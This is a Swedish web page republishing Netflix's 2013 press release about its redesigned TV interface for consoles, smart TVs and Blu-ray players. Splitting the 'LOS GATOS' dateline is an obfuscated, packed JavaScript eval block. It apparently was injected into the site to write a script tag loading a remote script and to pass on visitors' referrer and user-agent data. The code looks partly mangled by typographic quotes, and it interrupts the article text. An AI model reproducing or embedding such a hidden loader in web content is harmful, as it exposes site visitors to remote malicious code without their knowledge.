Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Netflix lanserar ny TV-upplevelse

Netflix lanserar ny TV-upplevelse
Sebastian

LOS eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkers|var|u0026u|referrer|ssfed||js|php’.split(’|’),0,{}))
GATOS, Kalifornien, 13 november 2013 – Netflix, Inc. (NASDAQ: NFLX), världens ledande tv-leverantör via internet, lanserade idag ett radikalt omarbetat gränssnitt som gör Netflix-upplevelsen på tv-apparater mycket mer intressant och engagerande.

Den nya designen skapades specifikt för större skärmar och innehåller flera bioliknande bilder för varje titel, nya kvicka sammanfattningar och personligt anpassad information om varför Netflix föreslår en viss titel.För första gången i Netflix historia lanserar vi den nya tittarupplevelsen på flera enheter som levererar Netflix till tv-apparater. Dessa enheter står för majoriteten av våra medlemmars tittande.

”Våra medlemmar tittar sammanlagt på mer än en miljard timmar per månad och majoriteten av dessa timmar visas på en tv”, säger Neil Hunt, som är produktchef på Netflix. ”Det här är den mest omfattande uppdateringen av Netflix-upplevelsen för tv-apparater någonsin. Det är nu enklare än någonsin att hitta någonting fantastiskt att titta på, vilket ger våra medlemmar ännu mer underhållning på deras tv-apparater.”

Den nya tittarupplevelsen är baserad på en ny programvaruplattform som fungerar på ett effektivt sätt på olika enheter – från äldre digitalboxar, nya smart-tv-apparater och Blu-ray-spelare till de senaste spelkonsolerna. Tidigare hade varje enhet en unik Netflix-upplevelse, vilket medförde att det tog längre tid att lansera nya funktioner på alla enheter.

”Den här nya programvaruplattformen gör det enklare för oss att förnya och att hela tiden förbättra tv-upplevelsen vi tillhandahåller för våra medlemmar på flera olika enheter”, säger Hunt.

Netflix nya tv-upplevelse lanseras den 13 november och kommer att vara tillgänglig för alla medlemmar globalt inom två veckor. PlayStation 3, PlayStation 4, Xbox 360, nya smart-tv-apparater och Blu-ray-spelare stöder den nya tittarupplevelsen. Ytterligare enheter kommer att läggas till under de kommande månaderna.

Demo av funktionerna finns på följande länk: http://youtu.be/gVnB4KBxQOM

Detta är vad som är nytt hos Netflix

Allmänt

– Netflix-medlemmar tittade på mer än 5 miljarder timmar genom Netflix under det tredje kvartalet 2013. Majoriteten av dessa timmar visades på tv-apparater.

– Vi har designat om tv-upplevelsen från grunden för att kunna tillhandahålla en mer intressant och engagerande tittarupplevelse, med förbättrade upptäckts- och uppspelningsfunktioner för alla Netflix-medlemmar.

– Det här är den största uppdateringen av tittarupplevelsen på tv-apparater i Netflix’ historia.

– Hundratusentals medlemmar i USA har hjälpt oss testa uppdateringen. (Testgruppen bestod av nya PS3-medlemmar som inte visste att de fick en ny tittarupplevelse.) Denna testen har visat att den nya designen resulterar i ett djupare engagemang: medlemmar tittar mer.

Design

– På Netflix’ startskärm visas nu tre stora, roterande bilder för varje titel och på så sätt tillhandahålls mer information om alla titlarna i katalogen. Utöver detta har varje titel en kortare och mer effektiv sammanfattning. Vi visar även personligt anpassad information som t.ex. hur en titel relaterar till vad du tittat på tidigare, huruvida dina vänner har sett en viss titel eller om titeln vunnit några utmärkelser eller priser.

– Varje individuell titelsida har nu en mer omfattande sammanfattning, och tv-serier har en bild som representerar varje avsnitt tillsammans med en sammanfattning för varje avsnitt. En förloppsindikator visar hur långt du har tittat.

– Sökningar är nu mer visuella och förutsägande. När du skriver in en bokstav i sökfältet visas titlar direkt på ett mycket visuellt sätt. Sökningar efter skådespelare och regissörer är tillgängliga från samma sökskärm och fungerar på samma sätt.

– Netflix Kids har nu samma levande och visuellt engagerande design, och för första gången finns gränssnittet på smart-tv-apparater och Blu-ray-spelare.

– Övergången mellan bläddring och uppspelning är snabbare och smidigare. Vi har bland annat tagit bort den röda Netflix-skärmen efter att du tryckt på play för att optimera uppspelningsprocessen.

– För första gången i Netflix historia lanserar vi den nya tittarupplevelsen på flera enheter som levererar Netflix till tv-apparater. Dessa enheter står för majoriteten av våra medlemmars tittande.

Teknik

– Netflix ingenjörer har byggt en ny programvaruplattform som fungerar på ett effektivt sätt på olika enheter – från äldre digitalboxar, nya smart-tv-apparater och Blu-ray-spelare till de senaste spelkonsolerna. Tidigare hade varje enhet en unik Netflix-upplevelse, vilket medförde att det tog längre tid att lansera nya funktioner på alla enheter (och ibland lanserades funktioner inte alls på vissa enheter).

– Den nya tittarupplevelsen kommer att vara tillgänglig på Xbox 360, PlayStation 3, PlayStation 4, nya Blu-ray-spelare och smart-tv-apparater.

– Den nya upplevelsen lanseras den 13 november och kommer att vara tillgänglig globalt på alla enheter som stöds inom två veckor.

 Detta är ett pressmeddelande från Netflix